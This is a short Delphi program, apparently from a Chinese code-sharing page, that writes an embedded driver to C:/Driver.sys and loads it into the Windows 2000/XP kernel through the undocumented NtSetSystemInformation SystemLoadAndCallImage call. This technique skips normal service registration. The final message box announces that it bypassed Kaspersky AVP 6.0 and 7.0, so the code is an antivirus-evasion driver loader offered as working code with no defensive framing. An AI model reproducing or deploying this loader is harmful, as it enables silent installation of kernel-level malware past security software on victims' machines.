Delphi加载驱动
1 program Project2; 2 3 uses 4 Windows, Native, JwaWinType, Unit_Driver; 5 6 function Is2KXp(): Boolean; 7 var 8 OSVer: TOSVersionInfo; 9 begin 10 Result := False; 11 OSVer.dwOSVersionInfoSize := Sizeof(TOSVersionInfo); 12 if GetVersionEx(OSVer) then 13 begin 14 if (OSVer.dwPlatformId = VER_PLATFORM_WIN32_NT) then 15 begin 16 if (OSVer.dwMajorVersion = 5) and ((OSVer.dwMinorVersion = 0) or 17 (OSVer.dwMinorVersion = 1))then 18 begin 19 Result := True; 20 end; 21 end; 22 end; 23 end; 24 25 function DriverSaveFile(lpszName: PChar):Boolean; 26 var 27 hFile:THandle; 28 BytesWrite: dword; 29 begin 30 Result := False; 31 DeleteFile(lpszName); 32 hFile := CreateFile(lpszName, GENERIC_READ or GENERIC_WRITE, FILE_SHARE_READ, nil, CREATE_NEW, 0, 0); 33 if hFile = INVALID_HANDLE_VALUE then Exit; 34 if WriteFile(hFile,DriverBuf,DriverSize, BytesWrite, nil) then Result := True; 35 CloseHandle(hFile); 36 end; 37 38 var 39 StrInit: TString; 40 GGSImage: SYSTEM_LOAD_AND_CALL_IMAGE; 41 begin 42 if (Is2KXp()) then 43 begin 44 if DriverSaveFile('C:/Driver.sys') then 45 begin 46 RtlInitAnsiString(@StrInit, '/??/C:/Driver.sys'); 47 RtlAnsiStringToUnicodeString(@GGSImage.ModuleName, @StrInit, True); 48 OutputDebugString('Load Driver: C:/Driver.sys'); 49 NtSetSystemInformation(SystemLoadAndCallImage, @GGSImage, sizeof(SYSTEM_LOAD_AND_CALL_IMAGE)); 50 51 MessageBox(0, 'Bypassed AVP 6.0&7.0.0.125', 'By Anskya', 0); 52 end; 53 end; 54 end.